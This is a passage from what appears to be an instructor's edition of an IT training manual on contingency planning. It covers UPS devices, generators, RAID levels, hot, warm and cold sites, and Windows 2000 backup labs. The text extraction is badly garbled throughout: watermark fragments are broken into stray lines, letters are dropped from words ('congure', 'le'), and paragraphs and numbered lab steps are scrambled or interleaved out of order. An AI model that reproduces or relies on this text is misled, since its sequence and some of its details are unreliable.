It does not matter that you do not have a UPS, you are just taking a look at how to congure one.
2. 3. 4. 5. 6.
Select the UPS tab.
In the Details box, click the Select button.
or
DO NO
Select Back-UPS Pro. For On Port, verify that COM1 is selected. Click Finish. Now you should see the Congure button. Click Congure.
ru ct
In
st
DU
PL
IC
AT
Under Select Manufacturer, select American Power Conversion. There are many models to choose from.
Ed
1.
Open the Power Options Control Panel.
iti
on
7.
Examine the options. They include Minutes On Battery Before Critical Alarm, When The Alarm Occurs Run This Program, and Next, Instruct The Computer To Shutdown. Click Cancel twice, and close the Control Panel window.
8.
Full Server Rack UPS Devices

Higher-end UPS devices are essentially the same in function as their smaller cousins, but with some signicant differences that add to their costs, such as: Increased battery capacity (high-end models enable you to hot-swap batteries). Battery packs typically have faster recharge times.
The software used to communicate with the PC is richer in features.
Incoming and outgoing electrical supplies are vigorously monitored. Event logging may be included. Output is sometimes user-adjustable.
or
DO NO
Some UPS devices can be rack-mounted. Such devices, being modular, allow for easy expansion. High-end models may go up to 500 KW to 1 MW, requiring a three-phase circuit. A greater range of environmental variables for operation is available.
One of the pilot projects was housed in a single building with entire oors lled with workstations. The incoming power supply was stabilized and fed to a switching station. If this external power supply ever tripped, a backup generator that could meet the needs of the whole building would take over. If this backup generator ran out of fuel (diesel) or malfunctioned, a second identical backup generator would take over. If either of these malfunctioned or if diesel was in short supply, a third backup generator would kick in. This third backup generator ran on a fuel other than diesel. The power generated was also stabilized and fed
In
st
About 15 years ago, the Indian government wanted to buy a Cray supercomputer for weather analysis and prediction. The U.S. government stepped in and blocked the sale, suspecting that the supercomputer could be clandestinely used for military purposes. The Indian government then turned to its premier computer engineers and programmers at the Centre for Development of Advanced Computing (CDAC), who then proceeded to design and build a massive parallel distributed computer (PARAM) by using a bunch of mini computers and hundreds or thousands of PC-class computers, all on a network.
Building Generators
DU
Some UPS models may themselves be fault-tolerant (that is, they will have some level of redundancy built in).
ru ct
PL
IC
AT
Displays on the UPS devices can be LCD readouts, rather than just LED signals.
Ed
Some UPS devices are SNMP-compatible (directly addressable on a network, or even via the Web), apart from the usual communication channels (serial or USB ports).
E
389
iti
on
to the switching station. The basement was taken over and dedicated to banks of batteries from oor to ceiling. So a steady source of electricity, whether from an external source or from the generators, constantly recharged these banks of batteries, which then fed squeaky-clean power to the computers in the building. In effect, the entire building was a single computer and the basement was the UPS.
Multiple Backups of Power Supplies
Ed or
DO NO
ru ct
Generator Types
In
Visit www.intenergies.com, a Georgia-based company, and click the Energy Library link for a good tutorial on energy, power generation, and related issues.
390
st
Electrical output can be broadly classied into two types: DC (Direct Current) and. AC (Alternating Current). As we all know, the advantage of DC is it can be stored, while AC cannot. AC can, however, be piped over vast distances, albeit with some losses along the way. Depending on the country you are in, the voltage required to run most of your electrical equipment can be broadly divided into 110 V AC at 60 Hz (mostly North America) or 220 V AC at 50 Hz (the rest of the world), though you will nd exceptions here and there. Cuba, for example, supports both 110 V and 220 V. For a more comprehensive list, visit http://kropla.com/electric2.htm. Portable generators are generally in the 5 KW range and top out at around 8 to 10 KW. Typical home systems top out at around 20 KW, while on-site generators for buildings can be installed at various capacitiestypically from 50 KW systems to 2 MW systems, depending on your requirements and budgetary constraints. As of this writing, it costs approximately $800 to $1200 per installed KW in the U.S., so a 50 KW system may cost around $60,000 to install while a
DU
Do most companies go to these extremes when designing electrical systems for their networks? Not likely. But would they do it if it was mission-critical? Absolutely. The above example is just one of thousands of such installations across the U.S. and around the world.
PL
Needless to say, the engineers accomplished their task in a few years and delivered the equivalent of a supercomputer.
IC
Figure 6-2: Multiple backups of power supplies for the CDAC pilot.
AT
iti
on
Because AC power typically suffers from uctuations, it is necessary to condition it before it reaches sensitive electrical equipment, for which we typically use devices like voltage stabilizers and spike busters.
Fuel Types
Generator Implementation
ru ct
Topic 6D
st
In
Using fault-tolerant disk congurations allowed by the OS. This is one of the rst steps to take when implementing some measure of backup. Such congurations are also termed Redundant Array of Independent Disks (RAID) and are assigned numbers to represent various congurations, such as disk mirroring (RAID 1) or disk striping with parity (such as RAID 5). Vendor-specic fault-tolerant congurations. As with tape backups, operating systems can have their own RAID software, or you can go with vendorspecic solutions. These are typically hardware solutions, such as a mirrored
Lesson 6: Contingency Planning 391
DO
There are many options for backing up the operating system, including: A tape backup of the OS. There are many methods to using tapes to backup the OS. Operating systems might have their own backup software, or you can go with vendor-specic solutions. More about tape backups will follow later.
NO
Backing Up the Operating Systems
DU
PL
Most small and medium-sized businesses in the U.S. take it for granted that electricity is to be purchased from the utility company serving their locality and that on-site power generation is only a fault tolerant measure. Larger establishments, however, that are fed up with erratic pricing and supply by utility companies (reinforced all the more by the events that took place early in 2001 in California) can make a conscious decision to install their own generation plant, and completely bypass the utility company altogether. In fact, they can even connect back to the grid and sell any excess power generated to the utility companies. The decision to implement a generator system for your building(s) is driven by economics of scale, but at least the consumer has a growing list of options that werent available just a decade ago.
Ed
IC
Diesel, propane, kerosene, gasoline (or petrol), CNG (compressed natural gas), LNG (liqueed natural gas), methanol, and ethanol are all popular types of fuel used by generators. The decision to use one type of fuel over another is typically made from a purely economic standpoint (apart from the fact that all of them release pollutants into the atmosphere and the local laws governing storage, use, and pollution control vary). In a few years, this topic will have to be completely rewritten, with emerging fuel-cell technologies holding a lot of promise.
or
AT
iti
on
2 MW system may cost around $1.6 million to install. Note that there a number of variables to consider, so these gures are useful only for initial discussions. You have to work with a manufacturer for more accurate pricing. Most of your electrical equipment then converts the received AC power as required for the job. For a rst look at such issues, check out this Web site: www.westernmachinery.com. Of course, you can always start at the worlds number 1 electrical company, GE, at their Web site: www.gepower.com.
Over and above these ready-made solutions for backup, a usage policy is critical to the success of the backup operation. Users must be trained to store their nished work on the le servers, or policies should be enforced that would prevent users from accessing local storage space.
RAID Levels
Ed
T DU
RAID Level 1, Disk Mirroring
st
In
Figure 6-3: RAID level 1, disk mirroring.
392
DO
ru ct
Figure 6-3 shows RAID level 1, with disk mirroring.
NO
PL
To explain the various RAID levels, we will use several gures. As you review these gures, note that the word level is misleading, as it connotes that one level leads to another. It is better to simply think of these numbers the way we treat some letters of the Greek alphabetas mathematical constants. Each gure also includes a percentage of efficiency. This is simply an indicator of how much disk space assigned to that RAID level can be used for actual data storage. It does not mean that one version is more efficient than the other. This is just a traditional way of expressing utilization percentage.
or
IC
AT
iti
A complete, fully functioning, machine congured as a backup. This is typically found in fault-tolerant cluster congurations. Two-way and four-way clusters are popular congurations, but can be implemented only by using operating systems at the higher end of the spectrum. Larger clusters can be created, but this requires highly specialized knowledge and personnel trained in the assembly of such systems.
on
RAID 0, also known as RAID 10. Hardware solutions take the load off of the CPU and are therefore faster and more suited for heavy-duty servers. Low-end systems may simply use the operating systems feature set to implement a supported RAID level. The decision to use one RAID level over another depends on disk-utilization efficiencies, and therefore, the time to restore, as well. For example, RAID 1 will allow you to utilize only 50 percent of the disk space earmarked. RAID 5 using three drives will allow you to utilize 66 percent (two out of three). However, in the event of a failure, RAID 1 will be up and running in next to no time, while RAID 5 will take some time to rebuild the data off the parity information stored on the other drives.
Figure 6-4 shows RAID level 1, with disk duplexing.

RAID Level 1, Disk Duplexing
Figure 6-4: RAID level 1, disk duplexing.
Figure 6-5 shows RAID level 5, with disk striping and parity.
Ed
T DU PL IC
Figure 6-5: RAID level 5, striping with parity.
NO
Figure 6-6 show RAID level 0, with a stripe set.
ru ct
or st In
DO
AT
RAID Level 0, Stripe Set
iti
RAID Level 5, Striping with Parity
on
393
Figure 6-6: RAID level 0, stripe set.
Figure 6-7 shows RAID level 10, with a mirrored stripe set.
RAID Level 10, Mirrored Stripe Set
Ed
T DU
or st In
To counter this threat, you have to have off-site facilities. They are classied into three types of sites: cold sites, warm sites, and hot sites. Cold sites are simply working spaces with associated physical security, power outlets, telecommunications, and Internet connectivity. Recovery time at a cold site is typically over three days. This is the most affordable option, and depending on the provider, can cost around $2,000 per month for the average customer. Warm sites, in addition to everything provided for in a cold site, consists of mission-critical components, and is partially, but not completely, congured with equipment. For example, rack mounts may be physically present and
DO
ru ct
Hardware Options
Figure 6-7: RAID level 10, mirrored stripe set.
So far, all of the backup strategies discussed are on the same site, maybe even on the same machine. What if the server room caught re or was ooded, and all of the machines became inaccessible?
NO
PL
IC
AT
iti
on
electrically ready, with no servers mounted in them. Such a site is viable if the recovery time is allowed to be greater than half a day, but under a day or two. This is by far the most popular option. Pricing cannot be standardized here, as it can only be worked out after the organization and the provider have thoroughly discussed what constitutes a warm site.
ru ct
To recover from these kinds of disasters we need a different kind of backupthe kind that, at the end of the day, takes that days information off the server and puts it away on some external media, where it will not be changed until it is overwritten at some future date. Tape drives are by far the most popular backup media as they are, byte for byte, one of cheapest forms of data storage. Most of these tapes currently retail for around $70 per 100 GB of storage (thats $0.70 per GB), and the prices continue to fall. At standard 2:1 compression rates, this brings the price down to $0.35 per GB. The only issue is speed. Data transfer rates are in the region of 20 MB/sec. That means lling such a tape to capacity will take approximately under 3 hours. In large data-storage centers that are performing normal backups daily, vast amounts of information would have to be backed up, and the tape drives would have to run almost incessantly. Therefore, alternative tape-backup solutions exist, whereby once a full backup is prepared, subsequent backups do not need to be backed up byte for byte. Rather, just the data that changed since that full backup was performed needs be backed up. This is known as a differential backup. If this method gets to be too demanding on tape capacity, then subsequent backups can simply back up data that changed since the last backup. This is known as an incremental backup.
or
DO NO
In
st
DU
PL
Comparing Normal, Differential, and Incremental Backups
IC
AT
Backup Options
E
395
For further education in this aspect of your business, you can also visit the Institute for Business Continuity Training at www.ibct.com.
Ed
Typically, an organization would not build and maintain its own cold, warm, or hot sites, but would instead purchase these services from another organization, such as Exodus (now Cable & Wireless PLC). If you visit www.cw.com, select your country, click the Products & Services link, then the Business Continuity & Recovery Services link; and nally the Facility Infrastructure Services link, you can read more about the various services offered by Cable & Wireless to set up such sites for your organization.
iti
on
Hot sites are practically a working replica of your server and client congurations. This is the most expensive option, and as with warm sites, pricing cannot be standardized here. If disaster strikes, then depending on the remaining manpower available and the training provided to them, the company can be up and running at the hot site in a matter of hours. By the way, the military is trained to do this all the time. Of course, you cannot compare a regular company with the military, but there are occasions when even civilian establishments require such levels of discipline to keep from going out of business altogether.
or
DO NO
ru ct In
This is an oversimplied tape-swapping operationin reality, one tape should always remain away from the server and the other backup tapes to protect against disaster, for instance, a re in the server room. Large organizations will not swap tapes on alternate days. Rather, they will maintain entire sets of weekly tapes. If they have to swap tapes, it will be from tape sets belonging from a few weeks or even a few months ago, depending on the quality-control requirements. Eventually tapes are retired (usually after a year or so), and one of the sets representing that year makes it to a long-term storage facility somewhere for recordkeeping purposes. Common terminologies that you will hear regarding tape reuse are the Grandfather-Father-Son (GFS) scheme and the Tower of Hanoi scheme. To learn more about these schemes, you can read an excellent article on Exabytes Web site, found at www.exabyte.com/support/online/documentation/whitepapers/ basicbackup.pdf.
st
In some instances (normal and differential backups), tapes can theoretically be reused without affecting restoration capabilities (the curved arrows connecting Weekend with Tuesday, Monday with Wednesday, and Tuesday with Thursday). Therefore, if youre performing a normal backup, the weekend tape can be reused on Tuesday night, because Monday nights tape holds all of the current information. Monday nights tape can be reused on Wednesday night, while Tuesdays tape can come back on Thursday.
DU
PL
IC
Take a look at Figure 6-8. This explains all three methods of backup. The typical backup cycle is run on a weekly basis. Notice that the normal backup begins over the weekend, when there is sufficient time to do a full, normal backup of the system. If this is a small business and all of the information ts on one tape, then a normal backup can be done every day.
AT
Figure 6-8: Comparing normal, differential, and incremental backups.
Ed
iti
on
When you employ the normal backup routine, restoration is extremely easy. All you need is the last backup. For example, if you need to restore from backup on Thursday, all you need is Wednesday nights tape set. The differential backup sequence begins like a normal backup sequence does. Over the weekend, a complete, normal backup is created. On Monday night, only those les that were changed on Monday are backed up. Notice that theres not much to back up on Monday. On Tuesday night, only the les that were changed on Monday and Tuesday are backed up. As the week progresses, the amount of data that needs to be backed up continues to grow. However, tapes can still be recycled within the week, as shown. With a differential backup scheme, if you need to restore from backup on Thursday, you need the weekend tape set and Wednesday nights tapes.
With an incremental backup scheme, if you need to restore from backup on Thursday, you need the weekend tape set and Monday, Tuesday, and Wednesday nights tapes, so you have to be careful how you label and store these tapes, as the tapes cannot be out of sequence at any time.
Ed
DU T PL IC
The incremental backup sequence begins like a differential backup sequence. Over the weekend, a complete, normal backup is created. On Monday night, only the les that were changed on Monday are backed up. Notice again that theres not much to back up on Monday. On Tuesday night, only the les that were changed on Tuesday are backed up, and so on. With this method of backup, tapes cannot be recycled during the week, as shown.
The table shown in Figure 6-9 describes bit positions of the Attribute byte.
ru ct st
Figure 6-9: The Attribute byte.
or
DO NO
How does the system decide what les to back up and what to ignore during the differential and incremental backup cycles? The answer lies in the Archive attribute bit. Apart from having a lename, parent directory, date created/ modied, and other identifying criteria, every le on your hard drive has eight bits that signify certain things to the OS, such as if the le is Read-Only, a System le, and so forth. These eight bits are known as the Attribute byte.
AT
The Attribute Byte
In
E
397
iti
on
When you perform a normal backup, all of the les that you have selected for backup will be backed up, and their respective Archive bits will be turned off. When you perform a differential backup, the backup software looks for only those les that have their Archive bits turned back on again, because some application opened, modied, and then saved those les. The archiving software will select only those les for backing up. However, during a differential backup, the archiving software will not set the Archive bit to the off position. Why is this? Because, according to the requirements, the baseline is set for the rst normal backup. After the normal backup, all les that were modied will have their Archive bit set to on and will remain on, even if the archiving software archived it, to preserve the baseline from the normal backup. When you perform an incremental backup, the backup software looks for only those les that have their Archive bits turned back on again, because some application opened, modied, and then saved those les. The archiving software will select only those les for backing up. During an incremental backup, the archiving software does set the Archive bit to the off position. Why? Because, according to the requirements, the baseline is set for each day. Every day is the baseline for the next day.
Ed
T DU
or
DO NO
Backup Strategies for Windows Computers
398
In
st
ru ct
Most operating systems have some backup and restore software included with them. In Windows 2000, ntbackup.exe can be run as both a command-line tool and as a GUI. This tool enables you to back up the entire system, portions of the system, or individual les to many media formats, including your own hard drive, to another hard drive, somewhere else on the network, to a tape drive, or even to a oppy disk. You are no longer constrained to using only a tape drive, as you were in Windows NT 4.
Current Products that Can be Used for Backup

Of course, you can purchase a third-party solution from companies such as Veritas (BackupExec), Seagate (Dantz), or Exabyte, which are typically used when higher-end backup solutions are needed. If you do, you will have to use their software to perform backups. Lets take a look at the built-in solution for backups provided for you in Windows 2000.
PL
IC
AT
iti
on
The purpose of the Archive bit is as follows: If this bit is ON, then the corresponding le has never been backed up (archived), or it has changed since last backup. If this bit is OFF, then the le does not need to be backed up, as it has not changed since the last time it was archived. In other words, if you back up a le by using archiving software, then the archiving software will turn the Archive bit off. When you use some application to modify that le, the moment you modify it, its Archive bit is turned back on again.
TASK 6D-1
Creating a Folder Structure
Setup: You are logged on to Windows 20000 as the renamed Administrator account. 1. 2. 3. 4. 5. 6. 7. 8. 9. Open Windows Explorer. Select your boot partition. Create a folder called BackReco.
In this folder, create three folders named Normal, Differential, and Incremental.
In the Normal folder, create two folders named Backup1 and Restore1. In the Differential folder, create two folders named Backup2 and Restore2.
Right-click anywhere within the Explorer window, and choose New Text Document. Rename the le normal.txt.
or
DO NO
12. Leave this Explorer window open.
In the following task, you will perform the steps necessary to back up the le that you just created. To start, you will initiate a normal backup.
In
st
Initiating the Backup Process
11. Double-click the le, enter any text that you like, and save and close the le.
DU
Record the le modication time here: Actual times will vary for each class.
ru ct
10. Observe that the le was created with the Archive attribute bit set.
PL
IC
AT
E
399
In the Incremental folder, create two folders named Backup3 and Restore3. Navigate to the BackReco\Normal\Backup1 folder.
Ed
iti
on
Objective: To create les and folders to be used in testing the backup solutions provided in the Windows 2000 OS.
TASK 6D-2
Initiating a Normal Backup
1.
From the Start menu, choose ProgramsAccessoriesSystem Tools Backup to start the Backup utility. You might want to create a shortcut to this utility on your Desktop so that you dont have to go through the menus in future tasks.
3. 4.
In the right pane, check the le name of the le you just created.
5. 6. 7. 8.
Name your backup le abc, and click Open. Towards the right side of the backup window, click Start Backup.
Ed
T DU
Towards the bottom of this window, where it says Backup Destination (File) and Backup Media Or File Name: a:\backup.bkf, click the Browse button, and navigate to the BackReco\Normal\Restore1 folder.
st
Viewing the Results of the Backup Process

Now that you have performed a normal backup, in the following task, you will check out the state of the Archive bit
400
In
DO
ru ct
9. 10. Click Cancel twice.
Click Properties. If you want to schedule this job for later as a one-off job or for repetitive backups on a daily, weekly, or monthly schedule, this is where you enter the options.
12. Click Close, and minimize the Backup utility.
NO
11. Click Start Backup. A few seconds later your backup should be complete.
PL
Click the Schedule button. The rst time you click this button, you will be prompted to save your settings. Do so with any name you like, and enter your logon credentials if you are prompted for them. The Scheduled Job Options dialog box is displayed.
or
IC
AT
Click the Advanced button. Verify that the Backup Type is set to Normal. Click OK.
iti
2.
Select the Backup tab. Expand your boot partition, and navigate to the BackReco\Normal\Backup1 folder.
on
Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Explorer is running.
TASK 6D-3
Viewing the State of the Archive Attribute Bit
1. 2. 3. 4. 5. 6.
Switch to the Explorer window. Verify that the le does not have the Archive attribute bit set. Double-click the le to open it in Notepad. Enter any extra text you like.
Save and close the le, and switch back to the Explorer window.
Observe that the Archive bit is now back on again. This means that the le has changed since the last backup and needs to be archived again. Also, observe that the le modication time has also changed.
or
DO NO
1. 2.
Switch to the Backup utility.
3. 4. 5. 6.
Expand the elements in the left pane until you can see your text le in the right pane, and then check your text le.
In
Click the Start Restore button. If you are prompted to conrm the restore, click OK. In the Enter Backup File Name text box, verify the path to your backup le, and click OK. Give Backup a few seconds to do its job. Your le should be restored for you. Click Close and minimize Backup.
st
Select the Restore tab. If the Restore tab contains text that indicates that existing les will not be replaced, choose ToolsOptions, select Always Replace The File On My Computer, and click OK.
Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.
DU
Restoring from a Backup
ru ct
PL
TASK 6D-4
IC
AT
Lets look at a scenario where we consider the last edit of the le to be a wrong edit; perhaps somebody tampered with the le or didnt know what they were doing, so you now have to restore the original le from backup.
Restoring a File from Normal Backup
Ed
iti
on
7. 8. 9.
Switch to the Explorer Window and observe the le modication time. It has reverted to the time that you recorded when you rst backed up the le. Open your text le in Notepad. Verify that the changes you had made are now gone and that the le is in its original state.
10. Close Notepad.
Understanding Differential Backup
In the following set of tasks, you will carefully construct and step through the requirements to initiate a differential backup and restore of a set of les. You will create separate backup les to mimic each day of backup. You will then mimic an accident by deleting all of the les in your folder. Finally, you will use the Restore feature to retrieve the deleted les.
TASK 6D-5
Preparing to Start a Differential Backup Sequence
Ed
T DU
st
7.
Leave this Explorer window open.
In
Backing Up Your Weekends Work

In the following task, you will perform the steps necessary to back up your weekends work.
402
DO
ru ct
3. 4. 5. 6.
Right-click in the Explorer window, and choose NewText Document. Rename this le Weekend.txt.
Record the le modication time: Modication times will vary.
Double-click the le, enter Last weeks work, and then save and close the le.
NO
As before, observe that the le was created with the Archive attribute bit set.
PL
2.
Expand your screen so that you can see all the columns. Add the Attributes column if it isnt displayed.
IC
1.
In Explorer, navigate to the BackReco\Differential\Backup2 folder.
or
AT
iti
on
TASK 6D-6
Initiating a Differential Backup Sequence
1. 2. 3.
Switch to the Backup utility, and Select the Backup tab. Choose ToolsOptions.
4. 5. 6. 7. 8. 9.
In the left pane, navigate to the BackReco\Differential\Backup2 folder. Check the folder.
Click the Browse button to specify the location of the backup media or le name. Navigate to the BackReco\Differential\Restore2 folder.
Ed
T DU PL IC
Click Start Backup, then click Start Backup again.
10. Wait a few seconds. When the backup is complete, click Close. 11. Close the Backup utility.
Adding Data During the Week
In the following task, you will proceed to add to the work that you did last week, after backing up your weekends work.
TASK 6D-7
Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer is running. 1. 2. 3.
In
Switch to Windows Explorer and select the BackReco\Differential\ Backup2 folder. As you had seen earlier, observe that the le Weekend.txt no longer has the Archive attribute bit set. Right-click in the Explorer window and choose NewText Document.
DO
Creating Additional Data
st
ru ct
NO
or
AT
For the le name, enter Weekend_normal, and click Open.
E
403
iti
Under Default Backup Type, verify that Normal is selected, and click OK. When you are going to be performing a differential backup, you rst perform a Normal backup.
on
4. 5.
Rename this le Monday.txt. As before, observe that the le was created with the Archive attribute bit set. Record the le modication time here: Actual times will vary for each class.
6. 7.
Double-click the le, enter Mondays work, and then save and close the le. Leave this Explorer window open.
Backing Up Data During the Week
In the following task, you will perform the steps necessary to differentially back up the work you did after backing up your weekends work.
TASK 6D-8
Continuing the Differential Backup Sequence
Ed
T DU
1. 2. 3. 4. 5.
Start the Backup utility. Select the Backup tab.
or
DO NO
In
404
st
ru ct
6. 7. Check the folder. 8. 9.
Choose ToolsOptions.
Under Default Backup Type, select Differential, and click OK. In the left pane, navigate to the BackReco\Differential\Backup2 folder.
Click the Browse button to specify the location of the backup media or le name. Navigate to the BackReco\Differential\Restore2 folder. For the lename, enter Mon_diff, and click Open. This now represents the follow-up to the normal backup you carried out earlier.
10. Click Start Backup, and then click Start Backup again. 11. When the backup is complete, click Close. 12. Minimize the Backup utility.
PL
IC
AT
Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer is running.
iti
on
Adding More Data

In the following task, you will perform the steps necessary to add more work after performing your rst differential backup.
Adding Data After a Differential Backup
1. 2.
Switch to Windows Explorer, and select the BackReco\Differential\ Backup2 folder.
3. 4.
Create a new text document named Tuesday.txt.
6.
ru ct
Backing Up More Data
TASK 6D-10
1. 2. 3.
In
Switch to the Backup utility. Choose ToolsOptions.
Under Default Backup Type, verify that Differential is selected, and click OK.
DO
Differentially Backing Up More Data
st
NO
In the following task, you will perform the steps necessary to back up the work you did after backing up your previous days work.
DU
PL
IC
5.
Double-click the le, enter Tuesdays work, and then save and close the le.
or
Record the le modication time: Modication times will vary.
AT
Ed
Observe that the Archive attribute bit for the le Monday.txt is still on. When you chose to do a differential backup, the le was backed up, but the Archive attribute bit was not touched.
iti
on
TASK 6D-9
4. 5. 6. 7. 8. 9.
In the left pane, navigate to the BackReco\Differential\Backup2 folder, and check the folder. Browse to specify the BackReco\Differential\Restore2 folder as the location of the backup media or le name.
Start the backup (click Start Backup, and then click Start Backup again). When the backup is complete, click Close. Minimize the Backup utility.
Accidentally Deleting Data
TASK 6D-11
or
DO NO
1. 2. 3. 4.
ru ct
Observe that the Archive Attribute bit for the le Tuesday.txt is still on. Delete all of the les in the Backup2 folder. Leave this Explorer window open.
Restoring Data from a Differential Backup

In the following task, you will use your backup les to restore all of the work you did this week and last week.
In
st
DU
PL
Switch to Windows Explorer, and select the BackReco\Differential\ Backup2 folder.
IC
AT
Destroying Backed-up Data
Ed
In the following task, you will mimic an accidental destruction of all of the work you did this week, as well as last weeks work.
iti
on
For the le name, enter Tue_diff, and click Open.
TASK 6D-12
Restoring Files from a Differential Backup
1. 2. 3. 4. 5. 6.
Switch to the Backup utility. Select the Restore tab. If you see some Media les, select all of them in the right pane, and choose ToolsMediaToolsDelete Catalog. Choose ToolsCatalog A Backup File.
In the left pane, expand File (the one with the CD-ROM icon) and the full path under Media Created On File (the one with the oppy disk icon) below it.
8. 9.
Check the Backup2 folder. Click the Start Restore button.
or
DO NO T
11. When the restore is complete, click Close. 12. Minimize the Backup utility.
ru ct
13. Switch to Windows Explorer, and select the BackReco\Differential\ Backup2 folder.
14. Observe that the Weekend.txt le is restored. But, you need to have this weeks work, too!
16. On the Restore tab, select the Media le, and choose ToolsMediaTools Delete Catalog.
18. Browse to the BackReco\Differential\Restore2 folder, and select Tue_diff.bkf. 19. In the left pane, expand File and the full path under the Media Created On File below it. Each time that you are prompted for the location of the le, verify that the
In
17. Choose ToolsCatalog A Backup File.
st
15. Switch to the Backup utility.
DU
PL
10. Click OK twice.
IC
AT
7.
If a pop-up is displayed, verify that the le listed is the Weekend_normal. bkf le, and click OK.
Ed
Browse to the BackReco\Differential\Restore2 folder, and select Weekend_normal.bkf. Click Open, and then click OK.
iti
on
le listed is the Tue_diff.bkf le, and click OK. 20. Check the Backup2 folder. 21. Start the restore.
26. Observe that both the Monday.txt and Tuesday.txt les have been restored.
Optional Tasks
or
DO NO
ru ct st In
1. 2. 3.
Understanding Incremental Backup

In the following set of tasks, you will carefully construct and step through the requirements to initiate an incremental backup and restore of a set of les. You will create separate backup les to mimic each day of backup. You will then mimic the accidental destruction of data by corrupting a le and by deleting all of the les in your folder. You will then use the Restore feature to retrieve the necessary les.
OPTIONAL TASK 6D-13
Preparing to Start an Incremental Backup Sequence

Navigate to the BackReco\Incremental\Backup3 folder. Expand your screen so that you can see all of the columns. Create a new text document named Weekend.txt.
DU
PL
IC
The previous set of tasks were designed to walk you through the process of backing up and restoring a set of les by using the differential backup method. The set of tasks that follow are optional and are designed to help you understand the steps required to achieve the same objective, this time by using the incremental backup method. Because we are using very small les to illustrate the process, it may seem that theres not much difference between the two in terms of time taken to back up and restore. In the real world, when faced with the choice of backing up large amounts of data every day, there can sometimes be an order of magnitude in the difference between adopting one method over the other.
Ed
AT
iti
25. Switch to Windows Explorer, and select the BackReco\Differential\ Backup2 folder.
on
22. Click OK twice.
4.
As before, observe that the le was created with the Archive attribute bit set. Record the le modication time: Modication times will vary.
5. 6.
Backing up Your Weekends Work
Initiating an Incremental Backup Sequence
2. 3.
or
DO NO
5. 6. 7. 8. 9.
Check the folder.
For the le name, enter Weekend_normal, and click Open.
When the backup is complete, click Close.
10. Minimize the Backup utility.
Adding Data During the Week

In the following task, you will proceed to add to the work you did last week.
In
st
Start the backup.
Browse to specify BackReco\Incremental\Restore3 as the location of the backup media or le name.
DU
4.
In the left pane, navigate to the BackReco\Incremental\Backup3 folder.
ru ct
PL
Under Default Backup Type, select Normal, and click OK. When you are going to be performing an incremental backup, you rst perform a normal backup.
IC
AT
1.
Switch to the Backup utility, and Select the Backup tab.
E
409
Ed
OPTIONAL TASK 6D-14
iti
In the following task, you will perform the steps necessary to back up your weekends work.
on
Double-click the le, enter Last weeks work, and then save and close the le.
OPTIONAL TASK 6D-15

Creating Additional Data
1. 2. 3. 4.
Switch to Windows Explorer, and select the BackReco\Incremental\ Backup3 folder. As you had seen earlier, observe that the le Weekend.txt no longer has the Archive attribute bit set. Create a new text document named Monday.txt.
Record the le modication time: Modication times will vary. 5. 6. Double-click the le, enter Mondays work, and then save and close the le.
Backing Up Data During the Week
or
DO NO
In the following task, you will perform the steps necessary to incrementally back up the work you did after backing up your weekends work.
ru ct In
Continuing the Incremental Backup Sequence

st
1. 2. 3. 4.
Switch to the Backup utility, and verify that the Backup tab is active. Choose ToolsOptions.
Under Default Backup Type, select Incremental, and click OK. In the left pane, navigate to the BackReco\Incremental\Backup3 folder. Check the folder. Browse to specify BackReco\Incremental\Restore3 as the location of the backup media or le name.
5. 6.
DU
OPTIONAL TASK 6D-16
PL
IC
AT
Ed
iti
on
7. 8. 9.
For the le name, enter Mon_incr, and click Open. This now represents the follow-up to the normal backup you carried out earlier. Start the backup. When the backup is complete, click Close.
Adding More Data

In the following task, you will perform the steps necessary to add more work after performing your rst incremental backup.
OPTIONAL TASK 6D-17

Adding Data After an Incremental Backup
Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running. 1. 2. Switch to Windows Explorer, and select the BackReco\Incremental\ Backup3 folder.
Ed
T DU PL IC
Observe that the Archive attribute bit for the le Monday.txt is now off. When you chose to do an incremental backup, the le was backed up and the Archive attribute bit was set to 0.
4.
As before, observe that the le was created with the Archive attribute bit set. Record the le modication time: Modication times will vary.
5. 6.
Double-click the le, enter Tuesdays work, then save and close the le. Leave this Explorer window open.
st
Backing Up More Data
In the following task, you will perform the steps necessary to incrementally back up the work you did after backing up your previous days work.
In
DO
ru ct
3.
Create a new text document named Tuesday.txt.
NO
or
AT
E
411
iti
on
OPTIONAL TASK 6D-18

Incrementally Backing Up More Data
1. 2. 3. 4. 5. 6. 7. 8. 9.
Switch to the Backup utility.
Verify that the Incremental Backup option is selected, and click OK.
Check the folder.
For the lename, enter Tue_incr, and click Open. Start the backup.
When the backup is complete, click Close. Minimize the Backup utility.
Ed
T DU
Browse to specify BackReco\Incremental\Restore3 as the location of the backup media or le name.
st
2. 3. 4. 5. 6.
Observe that the Archive attribute bit for the le Tuesday.txt is off. Open Monday.txt. Delete the existing text. Add some gibberish, and save and close the le. Observe that the Archive bit is back on again for Monday.txt. Leave this Explorer window open.
412
In
DO
ru ct
1.
OPTIONAL TASK 6D-19
Corrupting Backed-up Data
Switch to Windows Explorer, and select the BackReco\Incremental\ Backup3 folder.
NO
PL
In the following task, you will simulate a situation where someone trashes a le by replacing it with unwanted text.
IC
Accidentally Corrupting Data
or
AT
iti
In the left pane, navigate to the BackReco\Incremental\Backup3 folder.
on
Restoring Data from an Incremental Backup

In the following task, you will use your backup les to restore just the work that was messed up, not all of the data.
Restoring an Incrementally Backed-up File
1. 2. 3. 4. 5. 6. 7. 8. 9.
Switch to the Backup utility. Select the Restore tab. If you see some media les, delete the catalog. Choose ToolsCatalog A Backup File.
Browse to and open \BackReco\Incremental\Restore3\Mon_incr.bkf.
Ed
T DU PL IC
Check the Backup3 folder. Start the restore. Click OK twice.
12. Switch to Windows Explorer, and select the BackReco\Incremental\ Backup3 folder. 13. Open Monday.txt, and verify that it has been properly restored. 14. Close Notepad.
st
Performing an Incomplete Restore from Incremental Backup

In the following task, you will mimic the accidental destruction of all the work you did this week and last week. You will then incorrectly try to restore all the work you lost. This will help you understand the right way of implementing a restore from incremental backup.
In
DO
ru ct
NO
or
AT
In the left pane, expand File and the full path under the Media Created On File below it (verifying the le location as you expand).
E
413
iti
on
OPTIONAL TASK 6D-20
OPTIONAL TASK 6D-21

Incompletely Restoring from Incremental Backup
1. 2. 3. 4. 5. 6. 7. 8. 9.
Highlight all three text les in the Backup3 folder, and delete them. Leave this Explorer window open. Switch to the Backup utility.
On the Restore tab, if you see some media les, delete the catalog. Choose ToolsCatalog A Backup File.
